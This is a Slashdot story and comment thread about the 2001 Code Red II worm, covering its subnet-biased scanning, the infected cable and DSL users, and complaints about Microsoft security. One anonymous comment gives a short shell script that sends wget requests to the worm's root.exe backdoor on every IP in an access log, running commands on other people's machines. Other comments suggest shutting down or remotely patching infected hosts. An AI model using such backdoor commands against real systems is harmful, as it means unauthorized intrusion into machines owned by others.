Code Red Back For More

Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.

Re:If this can't break Microsoft's back nothing wi

[Tackhead]

> My microwave doesn't blue screen and cook my brain inside out.
>
> SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be succeptable to cracks and attacks that are easily preventable.

For his track record of trading security for market share, I'm just as happy as any Slashdotter to see Bill Gates' nuts roasted over a fire until they pop.

But the fact is, your PC - whether it runs CP/M, BeOS, FreeBSD, Linux, or Windows XP - is fundamentally different from embedded systems like your microwave and your car.

Design flaws can exist - in medicines, in consumer products, in closed-source applications, and yes, in open-source applications.

The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.

The reason it's "allowed" to crash is the same reason automobiles are "allowed" to crash -- sometimes it's a design flaw (Code Red IIS exploit, BIND exploit, Ford Pinto gas tank that exploded on rear impact), and sometimes it's operator error (SirCam worm, drunk driver).

> I hope no one keeps personal, private, confidential and financial data on there pc's.

The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench. Ya gotta do what ya gotta do.

Of course...

[Jason W]

If you get tired of seeing the requests, you could always shut the server down [securityfocus.com] (the requesting server of course, not yours :).

Might not remove the worm, but at least gets the "admin" (ha) to pay some attention. Maybe make a request for YOU_HAVE_THE_CODE_RED_WORM_YOU_MORON.HTML right before you do it in case they check the logs :)

Re:If this can't break Microsoft's back nothing wi

[IronChef]

Unlike a car that explodes to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.

Re:Why don't they...

[rawg]

This will not work. How is your worm going to spread if you fix the system?

Re:What are you talking about?

[sunhou]

• One time out of eight, and entirely random IP address is generated
• Four times out of eight, the lower octet of the IP address is randomized (192.168.1.X)
• Three times out of eight, the lower two octets are randomized (192.168.X.Y)

This is very interesting. I've recently been studying spatial population models of dispersal, e.g. when trees release seeds, should they go a short distance or a long distance? I.e. which will make them more likely to survive, and what combination of strategies will be evolutionarily stable?

Short-distance dispersal is best on aggregated landscapes, where good habitat is likely to be nearby, although such strategies end up competing with themselves quite intensely. Long-distance dispersal is good on unclustered landscapes, where you're better off hoping to colonize a good site far away. But it turns out that mixed seem to really kick butt; they exploit local rich patches of resources, but an occasional long-distance propagule allows them to colonize far-off patches once in a great while, and also reduces intraspecific competition somewhat.

It would be really interesting seeing a few different Code Red's going with different proportions of near versus far dispersal, to see which one does best. It would tell us something about the aggregation of exploitable machines on the net. Although I suppose some people may object to such a study.

As an AC pointed out in another reply, the really clever thing to do would be to have an adaptive strategy with a bit of randomness in it (i.e. the parameters in the strategy are changing too). That way, it would eventually "find" the strategy that works best, and in fact different subpopulations could converge to different locally optimum strategies.

what is code red. .

[n3m6]

when will you people realize that code red is not just another worm that will fade away soon.. code red makes not only IIS webservers vulnerable.. but any service with an available exploit. i'm talking about the "code red algorithm" that it uses to scan the ip's and spread so fast. this is what makes code red so special.. and this is why we'll be having more of this soooner than you guys think.. its DDOS days all over again..

The end is near...

[TrevorB]

So let me get this straight... Every machine on the planet practically has a list of infected IP addresses broadcasted to them, with a new one arriving every minute or so (up to 663 XXX's here in the past two hours).

So that means any loser with this list of infected IPs and some knowledge of perl literally has a small army of computers at their command?

I think we might be seeing some rather impressive DDoS attacks by this evening.

Hmm.. 3 more XXX's in the time it took me to write this... frequency's increasing...

What are you talking about?

[whatnotever]

"Code red algorithm"??? It's called a random ip scan. In this variation, it's called a scan of the local subnet with a random ip thrown in every now and then. There's nothing special about it.

It's fast because that's how exponential growth works.

If this can't break Microsoft's back nothing will.

[cybrthng]

If there isn't one thing that can break the straw nothing will.

I'm warned that smoking and drinking are bad for my health

Medicines and drugs aren't legal unless they're fully tested and approved

My car doesn't lock up and freeze

My microwave doesn't blue screen and cook my brain inside out.

SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be succeptable to cracks and attacks that are easily preventable.

WHY do i have to pay extra for the functionality of NOT being succeptable to virii and net attacks?

WHY doesn't microsoft NOTIFY me of the risks of using its OS?

I hope no ones bank is trusting microsoft, i hope anyone doing online transactions don't trust microsoft. I hope no one keeps personal, private, confidential and financial data on there pc's.

I hope no one running Windows is on the internet for that matter.

Never name a virus by the name its author intended

[cyberdonny]

From the article [unixwiz.net]:

In particular, the fact that it has "CodeRedII" inside means that it couldn't possibly be the original worm -- the name wasn't attached until after it was released.

If this beast is truely wicked, it will scan assorted websites such as Slashdot, Wired, etc, and as soon as it will see talk about itself [slashdot.org] it will enter its active phase...

Re:A few more details:It's a root trojan

[Anonymous Coward]

#!/bin/sh
for address in `cat /var/log/apache/access.log.0 |awk '{print $1}'`
do
wget -t 1 'http://'$address'/scripts/root.exe?/c+ren+root.ex e+fire_your_admin.dat'
done

Not clean nor graceful and it only works if all you accessess come from red alerts, but it works and its quite easy to adjust.

Re:A few more details

[nebby]

I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per say, but perhaps the old code red does something to tell the new code red to "come here" or something?

The fact the old code red is turned off tells me that they might be linked to the same person/organization or something.. if I were some independant cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.

It's not safe to install IIS while on a network...

[weave]

With this high a number if scans it is now suicidal to install IIS while connected to the net. Chances are very good that your box will get compromised before you have a chance to apply the patch, even if you do so right away. And since people can easily set up a reverse hack to automatically do other nasty stuff to your box after THEY get probed, the risk is even higher.

Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

Re:Source?

[Maditude]

Here's a speedy one...

#!/bin/sh
grep default.ida /var/log/httpd-access.log | cut -f 1 -d ' ' | sort

Why don't they...

[Greyfox]

Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...

Free r00t for all!

[whatnotever]

So here we basically have thousands of boxes with open backdoors, _broadcasting_ their presence to the world.

And with people so nicely distributing their logs here in this forum, the collection of ips is easier than ever!

Now that they have the backdoors, though, how hard would it be to patch them remotely? I'm thinking that if you put up a single exe on any old webserver, you could tell each infected host to just download and execute it. The only problems are writing the exe (not too hard), and figuring out how to get the host to download it, using the backdoor (probably trivial).